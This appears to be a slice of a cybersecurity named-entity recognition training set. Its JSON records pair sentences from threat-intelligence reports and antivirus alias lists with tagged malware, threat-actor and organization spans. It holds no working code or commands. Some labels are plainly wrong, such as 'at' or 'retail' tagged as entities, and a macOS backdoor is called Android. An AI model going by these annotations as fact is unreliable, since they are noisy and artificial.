{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9986 BackDoor.Msft.1 BehavesLike.Win32.SoftPulse.dc Virus.Win32.Virut Trojan.Zusy.D2EADF Worm:Win32/Chir.D@mm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002320", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-PSW.Win32.Dybalom!O Trojan/Downloader.Small.almj W32/Downldr2.GCMU Win32/SillyPWS.T Win.Downloader.74007-1 Trojan-PSW.Win32.Dybalom.g Trojan.Win32.Small.vtda Trojan.Win32.Downloader.20992.MH TrojWare.Win32.TrojanDownloader.Small.~ZBL Trojan.DownLoad.41539 Downloader.Small.Win32.13741 W32/Downloader.UMUW-8666 TR/Dldr.Small.almk Trojan[PSW]/Win32.Dybalom Trojan-PSW.Win32.Dybalom.g PWS:Win32/Strpasseal.B Trojan/Win32.Downloader.R17920 TrojanPSW.Dybalom Win32.Trojan-qqpass.Qqrob.Pcsc Trojan.PWS.Strpasseal.P Trojan-Downloader.Win32.Small W32/Dybalom.SMA!tr Win32/Trojan.PSW.99c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002323", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.9AE7 Trojan.Regrun TROJ_DDOS.SMA Win.Trojan.VBDos-1 Trojan.Win32.Regrun.zft Trojan.Win32.Regrun.ewhpgb Trojan.DownLoader5.32190 TROJ_DDOS.SMA BehavesLike.Win32.Adware.dc Trojan.Regrun.aj Trojan/Win32.Regrun Trojan:Win32/Tocofob.A Trojan.Win32.Regrun.zft Trojan/Win32.Buzus.C23616 SScope.Trojan.VBRA.11870 Trojan.Heur.VP2.E3BBE8 Trojan.Win32.VB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002325", "source": "cyner2_train"}}
{"text": "As such, FastPOS's update does not come as a surprise—in time for the oncoming retail season to boot.", "spans": {"MALWARE: FastPOS's": [[9, 18]], "ORGANIZATION: retail": [[79, 85]]}, "info": {"id": "cyner2_train_002326", "source": "cyner2_train"}}
{"text": "From what I can tell its still under development, this article will tell the story of this ransomware.", "spans": {}, "info": {"id": "cyner2_train_002329", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Bloodhound.Morphine BehavesLike.Win32.RAHack.qc Trojan.Win32.Hrup Packed.Morphine.a Backdoor:Win32/Wurdux.A.dll Trj/CI.A Packed/Morphine.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002330", "source": "cyner2_train"}}
{"text": "The Postal Group is active since at least 2013 and was responsible for multiple different malware", "spans": {"ORGANIZATION: The Postal Group": [[0, 16]], "MALWARE: malware": [[90, 97]]}, "info": {"id": "cyner2_train_002331", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9995 W32/Trojan.OTQR-6881 Backdoor.Win32.Elirks.o Trojan.Win32.Elirks.evicnk Trojan.Win32.Z.Zbot.5650944 Trojan.DownLoader25.56963 Backdoor.Elirks.Win32.6 Trojan.Zbot.7 Backdoor.Win32.Elirks.o Trojan:Win32/Ralminey.A Backdoor.Elirks Win32/Trojan.BO.56e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002332", "source": "cyner2_train"}}
{"text": "This blogpost reveals many details about the Diskcoder.C aka ExPetr, PetrWrap, Petya, or NotPetya outbreak and related information about previously unpublished attacks.", "spans": {"MALWARE: ExPetr, PetrWrap, Petya,": [[61, 85]], "MALWARE: NotPetya": [[89, 97]]}, "info": {"id": "cyner2_train_002335", "source": "cyner2_train"}}
{"text": "The group has access to zero-day exploits, most likely obtained through the Elderwood framework, and uses custom-developed back door malware.", "spans": {"THREAT_ACTOR: The group": [[0, 9]], "VULNERABILITY: zero-day exploits,": [[24, 42]], "THREAT_ACTOR: Elderwood framework,": [[76, 96]], "MALWARE: back door malware.": [[123, 141]]}, "info": {"id": "cyner2_train_002337", "source": "cyner2_train"}}
{"text": "The group behind this operation has been launching targeted and possibly politically-motivated attacks to spy on individuals.", "spans": {"THREAT_ACTOR: group": [[4, 9]], "THREAT_ACTOR: operation": [[22, 31]]}, "info": {"id": "cyner2_train_002338", "source": "cyner2_train"}}
{"text": "In October 2016 Forcepoint Security Labs™ discovered new versions of the MM Core backdoor being used in targeted attacks.", "spans": {"ORGANIZATION: Forcepoint Security Labs™": [[16, 41]], "MALWARE: versions": [[57, 65]], "MALWARE: MM Core backdoor": [[73, 89]]}, "info": {"id": "cyner2_train_002339", "source": "cyner2_train"}}
{"text": "These samples all displayed their typical respective malware characteristics and contacted known command and control C2 servers from those families.", "spans": {"MALWARE: malware": [[53, 60]]}, "info": {"id": "cyner2_train_002340", "source": "cyner2_train"}}
{"text": "Back in July 2015, a new ransomware as a service named Encryptor RaaS detected by Trend Micro as RANSOM_CRYPRAAS.SM entered the threat scene, rivaling or at least expecting to succeed the likes of similar get-rich-quick schemes from Tox and ORX Locker.", "spans": {"MALWARE: ransomware": [[25, 35]], "MALWARE: Encryptor RaaS": [[55, 69]], "ORGANIZATION: Trend Micro": [[82, 93]], "MALWARE: threat": [[128, 134]], "MALWARE: at": [[154, 156]], "MALWARE: Tox": [[233, 236]], "MALWARE: ORX Locker.": [[241, 252]]}, "info": {"id": "cyner2_train_002341", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Banker/W32.Bancos.688128 Trojan.Bancos W32/Trojan.VUPB-6515 Trojan-Banker.Win32.Bancos.vdfd W32.Virut.mACM Win32.HLLW.Autoruner2.26648 Dropper.Daws.Win32.12598 Trojan.Banker.Bancos.sn Trojan[Dropper]/Win32.Daws Trojan-Banker.Win32.Bancos.vdfd Trj/CI.A Trojan.Daws Win32.Worm.Autorun.Pepg Trojan.DR.Daws!WW+h/Y0MkUk Worm.Win32.WBNA Win32/Trojan.355", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002342", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Webtoolbar.Dealply Trojan.FakeAV not-a-virus:HEUR:WebToolbar.Win32.DealPly.heur Riskware.Win32.Estapa.ewzewu Trojan.Win32.Z.Dealply.1110121 Trojan.MulDrop7.57701 BehavesLike.Win32.BadFile.tc ADWARE/DealPly.rlhsh Ransom:MSIL/Hasadcrypt.A not-a-virus:HEUR:WebToolbar.Win32.Estapa.heur Trojan/Win32.Fakeav.C939114 BScope.Trojan.DiskWriter Trj/GdSda.A Trojan-Downloader.Win32.IstBar", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002343", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Win32.AutoRun!O Worm.Wofopey.A4 Trojan.Bodegun.1 TSPY_AUTORUN_CD1027DD.RDXN Win32.Worm.AutoRun.ek W32/Worm.BLGL W32.SillyDC TSPY_AUTORUN_CD1027DD.RDXN Win.Trojan.Clicker-4047 Trojan.Win32.Fsysna.dilg Trojan.Win32.AutoRun.buecr Worm.Win32.A.AutoRun.329559 W32.W.AutoRun.lnZm Win32.HLLW.Autoruner.57463 BehavesLike.Win32.Virut.cz W32/Worm.PEBZ-4739 Worm/Win32.AutoRun Worm:Win32/Wofopey.A Trojan.Win32.Fsysna.dilg Worm/Win32.AutoRun.R1864 Trojan-Dropper.Serv.21221 W32/Autorun.KBE Win32/AutoRun.AEZ Win32.Trojan.Fsysna.Wqmj Worm.AutoRun!UZZkfeUh6N8 Win32/Trojan.c29", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002347", "source": "cyner2_train"}}
{"text": "The document contains a malicious macro, which attempts to download the same executable file 65g3f4.exe from multiple remote locations.", "spans": {"MALWARE: malicious macro,": [[24, 40]]}, "info": {"id": "cyner2_train_002350", "source": "cyner2_train"}}
{"text": "The group has quietly deployed zero-day in the past, effectively spearphished targets, and maintains a modular toolset.", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: zero-day": [[31, 39]], "THREAT_ACTOR: spearphished": [[65, 77]], "MALWARE: modular toolset.": [[103, 119]]}, "info": {"id": "cyner2_train_002352", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Sdbot.AE4 RDN/Sdbot.worm!cc Backdoor.SDBot Win32.Trojan.WisdomEyes.16070401.9500.9979 RDN/Sdbot.worm!cc Trojan[Backdoor]/Win32.Sdbot Trojan.Zusy.D1B318 Backdoor:MSIL/Getob.D Backdoor.SDBot Msil.Worm.Arcdoor.Pgda Worm.MSIL.Arcdoor W32/SDBot.DPZ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002353", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Malware.Bucaspys.A W32.Malware.Bucaspys!c Trojan.PWS.Banker1.23491 BehavesLike.Win32.BadFile.rh W32/Trojan.MCYT-4284 Trojan:Win32/Bypass.D!bit Trj/GdSda.A W32/Banker.ADYA!tr.spy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002354", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exploit.Win32.Nuker!O W32/Trojan.Divine Win.Trojan.Nuker-3 Exploit.Win32.Nuker.Divine Exploit.Win32.Nuker.htqe Trojan.Divine Exploit.Nuker.Win32.284 W32/Trojan.Divine TR/Nuker.Divine Trojan[Exploit]/Win32.Nuker Exploit.Win32.Nuker.Divine Exploit.Nuker Nuker.Win32.Divine W32/Divine.3AD2!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002355", "source": "cyner2_train"}}
{"text": "PassiveTotal New discovered infrastructure from the Satellite Turla actor.", "spans": {"ORGANIZATION: PassiveTotal": [[0, 12]], "SYSTEM: infrastructure": [[28, 42]], "THREAT_ACTOR: the Satellite Turla actor.": [[48, 74]]}, "info": {"id": "cyner2_train_002357", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.VBCrypt.MF.66 Trojan.Razy.D15523 Win32.Trojan.VB.iw W32/VBTrojan.Downloader.1D!Maxi Troj.Dropper.W32.Dinwod.mmkC TrojWare.Win32.Rimod.JO Trojan.MulDrop4.62548 Trojan.Win32.Scar W32/VBTrojan.Downloader.1D!Maxi Trojan:Win32/Bewter.A HEUR/Fakon.mwf Win32/VB.RBU Win32/Trojan.741", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002358", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Spyware.Zbot.ED WS.Reputation.1 Krypt.GB TROJ_SIGEKAF.SM Trojan:W32/Kamala.A Trojan:Win32/Hilasy.B BScope.TrojanPSW.Zbot.2716 Trojan.Win32.Hilasy W32/ZBOT.HL!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002362", "source": "cyner2_train"}}
{"text": "This iteration is targeted towards victims in Vietnam and still maintains extremely low AV detection almost a year after it was first discovered.", "spans": {"SYSTEM: AV": [[88, 90]]}, "info": {"id": "cyner2_train_002363", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Sality.PE Win32.Sality.3 Virus/W32.Sality.D Worm.Win32.AutoIt!O W32.Sality.U W32/Autorun.worm.bcb Win32.Sality.3 PE_SALITY.RL W32/Autorun.TX W32.Harakit Win32/Sality.AA PE_SALITY.RL Win.Trojan.Autoit-150 Worm.Win32.AutoIt.aei Win32.Sality.3 Virus.Win32.Sality.beygb Trojan.Win32.FakeFolder.avr Win32.Sality.3 Win32.Sector.30 Virus.Sality.Win32.25 BehavesLike.Win32.Evasion.jc W32/Autorun.OHSM-3021 Win32/HLLP.Kuku.poly2 W32/Sality.AT Worm:Win32/Katar.A W32.Virut.lns0 Worm.Win32.AutoIt.aei Win32.Virus.Sality.A HEUR/Fakon.mwf Win32.Sality.3 Virus.Win32.Sality.bakc Win32/Sality.NBA Win32.Sality.BL Worm.Win32.Passma W32/Sality.AA Virus.Win32.Sality.I", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002365", "source": "cyner2_train"}}
{"text": "We assess it is highly likely that these attacks were conducted by a Chinese cyberespionage actor related to the Operation Soft Cell campaign.", "spans": {"THREAT_ACTOR: a Chinese cyberespionage actor": [[67, 97]], "THREAT_ACTOR: the Operation Soft Cell campaign.": [[109, 142]]}, "info": {"id": "cyner2_train_002366", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Riskware.Win32.MyBeeSearch.euqqpm Adware.Mybeesearch.17920 Adware.MyBeeSearch.Win32.35 W32/Trojan.ZETF-8401 ADWARE/MyBeeSearch.yttss Adware.BeeSearch/Variant Trj/GdSda.A Msil.Adware.Mybeesearch.Ednu PUA.MyBeeSearch! AdWare.MSIL.Mybeesearch", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002367", "source": "cyner2_train"}}
{"text": "Exploitation is being attempted via the usual tactic of spear phishing containing malicious attachments to targets.", "spans": {"VULNERABILITY: Exploitation": [[0, 12]], "ORGANIZATION: targets.": [[107, 115]]}, "info": {"id": "cyner2_train_002368", "source": "cyner2_train"}}
{"text": "It spreads within networks through PsExec and WMIC commands, using credentials stolen by a tool similiar to Mimikatz.", "spans": {"SYSTEM: networks": [[18, 26]], "SYSTEM: PsExec": [[35, 41]], "SYSTEM: WMIC commands,": [[46, 60]], "MALWARE: tool": [[91, 95]], "MALWARE: Mimikatz.": [[108, 117]]}, "info": {"id": "cyner2_train_002369", "source": "cyner2_train"}}
{"text": "The installer files contained custom action commands which used PowerShell to download and execute payloads Redline Stealer, Ursnif, etc. hosted on legitimate websites.", "spans": {"SYSTEM: PowerShell": [[64, 74]], "MALWARE: payloads Redline Stealer, Ursnif,": [[99, 132]]}, "info": {"id": "cyner2_train_002370", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Dropper.Zyon.1 Trojan.Win32.Dropper.Zyon.1 TROJ_ZYON.A TROJ_ZYON.A Trojan-Dropper.Win32.Zyon Trojan.Win32.Dropper.Zyon.1 Trojan.Win32.Zyon.hmat Troj.Dropper.W32.Zyon!c Trojan.Win32.Dropper.Zyon.1 TrojWare.Win32.Runner.Zyon Trojan.Win32.Dropper.Zyon.1 Trojan.MulDrop.103 Dropper.Zyon.Win32.4 BehavesLike.Win32.Dropper.dc W32/Trojan.AJWD-0098 TrojanDropper.Win32.Zyon W32/Zyon.A!tr Trojan[Dropper]/Win32.Zyon Trojan.Win32.Dropper.Zyon.1 Constructor/Zyon.261120 MultiDropper.cfg Win32/Runner.Zyon Win32.Trojan-dropper.Zyon.Lhdl Trojan.DR.Zyon!KwrmMz3+t6M Trojan.Win32.Runner Trojan.Win32.Dropper.Zyon.1 Dropper.Zyon.C Win32/Trojan.769", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002371", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exp.SWF.DC Exp.Flash.Pubenush.E!c Trojan.Swifi SWF/Exploit.ExKit.A Swf.Exploit.Angler-6 Exploit.Swf.CVE20130634.efwsmo Exploit.SWF.1232 HEUR_SWFDEC.SC2 BehavesLike.Flash.Exploit.nb Trojan[Exploit]/SWF.Neclu Exploit.SWF Win32/Trojan.a4a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002372", "source": "cyner2_train"}}
{"text": "It is an email with the subject of Copy of Invoice 79898702coming or pretending to come from noreply@random email addresses with a semi-random named zip attachment in the format of 79898702.zip random 8 digits The zip matches the subject.", "spans": {}, "info": {"id": "cyner2_train_002373", "source": "cyner2_train"}}
{"text": "The .js file in the email attachment is a PowerShell script and there are no other files involved.", "spans": {}, "info": {"id": "cyner2_train_002376", "source": "cyner2_train"}}
{"text": "Malware, or CHM, disguised as a North Korea-related questionnaire is being distributed by the Kimsuky group, which is believed to have created and distributed the same type of malware.", "spans": {"MALWARE: Malware,": [[0, 8]], "MALWARE: CHM,": [[12, 16]], "THREAT_ACTOR: the Kimsuky group,": [[90, 108]], "MALWARE: malware.": [[176, 184]]}, "info": {"id": "cyner2_train_002379", "source": "cyner2_train"}}
{"text": "The authors were probably trying to make a joke by referencing the act of getting infected with ransomware, hinting that it is uninvited and unavoidable, just like fate.", "spans": {}, "info": {"id": "cyner2_train_002381", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.Poison!IK W32/Smallworm.EEA BKDR_POISON.OM W32.SillyFDC Backdoor.Win32.Poison Dropper.VB.3.AX", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002382", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Sisproc.A Trojan.Sisproc Adware.Antivirus2008.Win32.13 Trojan/Jorik.Vobfus.fodz Win32.Trojan.Kryptik.gz Trojan.Malcol Win32/Tnega.cTBOJZC TROJ_REDONC_EK030008.UVPM Trojan.Win32.Antivirus2008.babyvq Trojan.DownLoader6.50299 TROJ_REDONC_EK030008.UVPM BehavesLike.Win32.Downloader.qc Trojan/Jorik.esyb Trojan/Win32.Vobfus TrojanDownloader:Win32/Redonc.D Trojan.Heur.D.E8DF45 Adware.Antivirus2008!VhbgDcClaWU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002383", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W64.Crypt.785568 Trojan.YarripCS.S244731 Trojan/Kryptik.bbq TROJ_KRYPTIK_FF070297.UVPM Win32.Trojan.WisdomEyes.16070401.9500.9998 TROJ_KRYPTIK_FF070297.UVPM Trojan.Win64.Crypt.gp Trojan.Win64.Kryptik.euskem Trojan.Win32.Z.Crypt.785568 Troj.Win64.Crypt!c Trojan.Crypt.Win64.20 Trojan.Crypt.ld Trojan.Win64.Crypt.gp Trojan.Bedep Trj/CI.A Win64.Trojan.Crypt.Wnms Trojan.Crypt!D766Elbq30w Trojan.Win64.Bedep", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002386", "source": "cyner2_train"}}
{"text": "An Android backdoor also known as: Trojan.MAC.Dok.E MacOS/Aptordoc.A HEUR:Trojan-Spy.OSX.Aptordoc.b Trojan.MAC.Dok.E Trojan.Mac.Mlw.eowttl Troj.Spy.Osx!c Win32.Trojan-spy.Aptordoc.Syhr Trojan.MAC.Dok.E Mac.BackDoor.Dok.5 Trojan.Aptordoc.OSX.7 MacOS/Aptordoc.A OSX/Spy.Aptordoc.jlgtm HEUR:Trojan-Spy.OSX.Aptordoc.b Trojan.MAC.Dok.E OSX/Spy.Dok.A Trojan-Banker.OSX.Aptordoc", "spans": {"MALWARE: backdoor": [[11, 19]]}, "info": {"id": "cyner2_train_002387", "source": "cyner2_train"}}
{"text": "Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years.", "spans": {"ORGANIZATION: Talos": [[0, 5]], "MALWARE: unknown Remote Administration Tool": [[24, 58]]}, "info": {"id": "cyner2_train_002388", "source": "cyner2_train"}}
{"text": "In this respect, Vawtrak now has a 2-tier C2 discovery infrastructure.", "spans": {"MALWARE: Vawtrak": [[17, 24]], "SYSTEM: infrastructure.": [[55, 70]]}, "info": {"id": "cyner2_train_002390", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojanproxy.Hioles.19337 Trojan.Graftor.D4C0E TSPY_PROXY_BK082A47.TOMC Win32.Trojan.WisdomEyes.16070401.9500.9968 TSPY_PROXY_BK082A47.TOMC Trojan.Proxy.23012 TrojanProxy:Win32/Hioles.B Troj.W32.Scar.lrnw Win32/TrojanProxy.Hioles.AA", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002391", "source": "cyner2_train"}}
{"text": "In the beginning of April 2016, we found evidence that the attacks against Israel have been renewed as well.", "spans": {}, "info": {"id": "cyner2_train_002395", "source": "cyner2_train"}}
{"text": "The Turla group use a range of tools and techniques, many of which are custom.", "spans": {"THREAT_ACTOR: The Turla group": [[0, 15]], "MALWARE: tools": [[31, 36]]}, "info": {"id": "cyner2_train_002396", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Kazy.D64E1 Win32.Trojan.WisdomEyes.16070401.9500.9929 Adware.Iefeats Trojan.Win32.Yabector.ddsrdc Adware.Yabector/Variant Heur.Packed.Unknown Adware.Adon Trj/CI.A Win32.Trojan.Kazy.Alij Trojan.CL.Yabector!M4hXuPydivM Win32/Trojan.e93", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002397", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Sicil.AA3 Win32.Trojan.WisdomEyes.151026.9950.9999 W32/Sicil.A TROJ_SICIL_0000009.TOMA Trojan-Dropper.MSIL.Smaba.sg Trojan.Win32.Click1.ctoram BehavesLike.Win32.Dropper.zt W32/Sicil.YGNC-5779 W32/Malware_fam.NB Trojan.Buzy.D8E9 Trojan:MSIL/Sicil.A Trojan.Msil PSW.ILUSpy Trj/CI.A Win32/Trojan.132", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002398", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Z.Shellcode.403968 Troj.W32.Tpyn!c BehavesLike.Win32.PWSZbot.fh Backdoor.Win32.Kbotrep W32/Trojan.FHRX-8606 Trojan.Heur.LP.E7F983 Backdoor:Win32/Kbotrep.A Trj/CI.A Win32.Trojan.Hijacker.Hzj Win32/Trojan.e04", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002399", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAdware.B36E Application.Bundler.DomaIQ.Q PUP.Optional.BundleInstaller Adware.DomaIQ.Win32.132 Adware.DomaIQ/Variant Application.Bundler.DomaIQ.Q Win32.Adware.DomnIQ.b Infostealer.Limitail Win32/DomainIQ.eOTUWS Win.Adware.Domaiq-1 not-a-virus:AdWare.MSIL.DomaIQ.clek Application.Bundler.DomaIQ.Q Trojan.Win32.DomaIQ.ctadmg Adware.Win32.Lollipop.f Application.Bundler.DomaIQ.Q Application.Win32.DomaIQ.URT Trojan.DownLoader9.21779 AdWare/MSIL.ps Pua.Tuguu GrayWare[AdWare]/MSIL.DomaIQ TrojanDownloader:Win32/Tugspay.A not-a-virus:AdWare.MSIL.DomaIQ.clek Win32.Application.DomalQ.G PUP/Win32.DomaIQ.R99208 BScope.Downware.DomaIQ PUA.DomaIQ! Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002400", "source": "cyner2_train"}}
{"text": "Between December 2021 and July 2022, the Mandiant Managed Defense and Incident Response teams responded to three UNC961 intrusions at different organizations that each started in similar fashion.", "spans": {"ORGANIZATION: the Mandiant Managed Defense and Incident Response teams": [[37, 93]], "THREAT_ACTOR: UNC961": [[113, 119]], "ORGANIZATION: organizations": [[144, 157]]}, "info": {"id": "cyner2_train_002403", "source": "cyner2_train"}}
{"text": "When the user tries to open one of these legitimate apps, the malware replaces the genuine app window with a phishing window that asks for banking information.", "spans": {"ORGANIZATION: user": [[9, 13]], "SYSTEM: legitimate apps,": [[41, 57]], "MALWARE: malware": [[62, 69]]}, "info": {"id": "cyner2_train_002407", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.TikoraxaDSB.Trojan Trojandownloader.Script W32/Snojan.OHXS-3777 VBS/TrojanDownloader.Small.NGH Trojan.Win32.Mlw.evnleg Troj.Downloader.Script!c BehavesLike.Win32.Downloader.dh Trojan-Downloader.VBS.Small W32/Snojan.Q Trojan.Pincav.aer VBS/Dldr.Small.vxbdh Trojan.DL.Alien! Trojan.Snojan Trj/CI.A Script/Virus.72d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002410", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DownLoadRiniLTN.Trojan Trojan.Win32.Scar!O Trojan.Popureb.B4 Trojan/Scar.ejkj Trojan.Zusy.D2E760 TROJ_POPUREB.SM Win32.Trojan.Scar.i Win32/Scar.ZF TROJ_POPUREB.SM Win.Trojan.Scar-8452 Trojan.Win32.Scar.bccuvv Trojan.Win32.A.Scar.86016.F Backdoor.Win32.Popwin.~IT Trojan.DownLoader11.5691 Trojan.Scar.Win32.75436 BehavesLike.Win32.Dropper.mm Backdoor.Win32.Poison TR/Popureb.B.20 Trojan/Win32.Scar Win32.Troj.Poison.b.29696 Trojan:Win32/Popureb.B Trojan/Win32.PbBot.R3997 Trojan.Scar Trojan.Scar Trojan.Win32.Scar.tgh Trojan.Ghodow!qzMoVFGUIfc W32/Scar.ENA!tr Win32/Trojan.285", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002412", "source": "cyner2_train"}}
{"text": "In the past, we investigated TorLocker and its flawed encryption, which was created and negotiated worldwide by a Brazilian cybercriminal.", "spans": {"MALWARE: TorLocker": [[29, 38]], "VULNERABILITY: flawed encryption,": [[47, 65]], "THREAT_ACTOR: Brazilian cybercriminal.": [[114, 138]]}, "info": {"id": "cyner2_train_002413", "source": "cyner2_train"}}
{"text": "The Trojan itself is well known and contained x32 and x64 rootkits.", "spans": {"MALWARE: Trojan": [[4, 10]], "SYSTEM: x32": [[46, 49]], "SYSTEM: x64": [[54, 57]], "MALWARE: rootkits.": [[58, 67]]}, "info": {"id": "cyner2_train_002414", "source": "cyner2_train"}}
{"text": "The multiple downloads is probably a redundancy measure in case some sources are taken down.", "spans": {}, "info": {"id": "cyner2_train_002415", "source": "cyner2_train"}}
{"text": "In this case it capitalized on the recent terrorist attack in New York City.", "spans": {}, "info": {"id": "cyner2_train_002416", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BackDoor-CYK.srv Backdoor/VB.alk Backdoor.VB!XZJVRUVgqYg W32/Backdoor.LPS TROJ_MALKZR.A Backdoor.Win32.VB.alk Backdoor.Win32.VB.37168 Backdoor.Win32.VB!IK Backdoor.Win32.Delf.~EC TROJ_MALKZR.A Heuristic.BehavesLike.Win32.Downloader.D Backdoor/VB.rj Backdoor:Win32/Norachs.A W32/Backdoor.LPS Win-Trojan/Xema.variant Trojan.Win32.VB.ALK Win32/VB.ALK Backdoor.Win32.VB W32/VB.ALK!tr BackDoor.VB.FLP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002417", "source": "cyner2_train"}}
{"text": "Our analysis reveals connections between these attacks, recent strategic web compromises against Burmese government websites, and previous campaigns targeting groups in the Tibetan community.", "spans": {"THREAT_ACTOR: campaigns targeting groups": [[139, 165]]}, "info": {"id": "cyner2_train_002418", "source": "cyner2_train"}}
{"text": "In past revivals, the botnet has been distributed through malicious emails containing attachments or links to compromised websites hosting exploit kit content.", "spans": {"MALWARE: the botnet": [[18, 28]], "MALWARE: exploit kit": [[139, 150]]}, "info": {"id": "cyner2_train_002419", "source": "cyner2_train"}}
{"text": "A backdoor also known as: PWS-Xema.dr PWS-Xema.dr Trojan.Win32.Malware.4 W32/Smalltroj.IUNZ Win32.TRCrypt.XPACK Trojan.Win32.Pincav.cay Trojan.MulDrop.29150 Trojan:Win32/Cinject.B Win-Trojan/Ristix.8192 Trojan.Win32.Pincav.cay Packer.Win32.UnkPacker.a Trj/Downloader.MDW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002421", "source": "cyner2_train"}}
{"text": "However, after reverse analysis, we found that it to be part of a brand new family, which we called Alice.", "spans": {"MALWARE: family,": [[76, 83]], "MALWARE: Alice.": [[100, 106]]}, "info": {"id": "cyner2_train_002422", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGameZLEU.Worm Trojan.Reval.28280 TROJ_SPNR.05AD13 TROJ_SPNR.05AD13 Worm.MSIL.Autorun Trojan/MSIL.hcf TR/BAS.Samca.22510458 Trojan/MSIL.Hor Trojan:MSIL/Reval.A Trojan.Zusy.D53EB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002426", "source": "cyner2_train"}}
{"text": "These analysts were linked by their coverage of the telecommunications industry, making this targeting very similar to, and likely a continuation of, activity described in our In Pursuit of Optical Fibers and Troop Intel blog.", "spans": {}, "info": {"id": "cyner2_train_002427", "source": "cyner2_train"}}
{"text": "Perhaps the most interesting aspect of the Snake Wine group is the number of techniques used to obscure attribution.", "spans": {"THREAT_ACTOR: Snake Wine group": [[43, 59]]}, "info": {"id": "cyner2_train_002428", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dumpy.A6 Trojan.Zusy.DFB8F W32.Dompie WORM_DUMPY.SM23 Trojan.Win32.Hesv.apqe Trojan.Win32.AVKill.dqemmh Troj.W32.Scar.tnl2 TrojWare.Win32.Injector.XYNZ Trojan.AVKill.33151 WORM_DUMPY.SM23 WORM/Taranis.2225 Trojan.Win32.Hesv.apqe HEUR/Fakon.mwf Trojan.Scar Worm.AutoRun Worm.Win32.Dumpy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002429", "source": "cyner2_train"}}
{"text": "It mainly targets Chinese users, but has also successfully affected people and organizations in the United States, United Kingdom, Thailand, Spain, and Ireland.", "spans": {"ORGANIZATION: Chinese users,": [[18, 32]], "ORGANIZATION: people": [[68, 74]], "ORGANIZATION: organizations": [[79, 92]]}, "info": {"id": "cyner2_train_002431", "source": "cyner2_train"}}
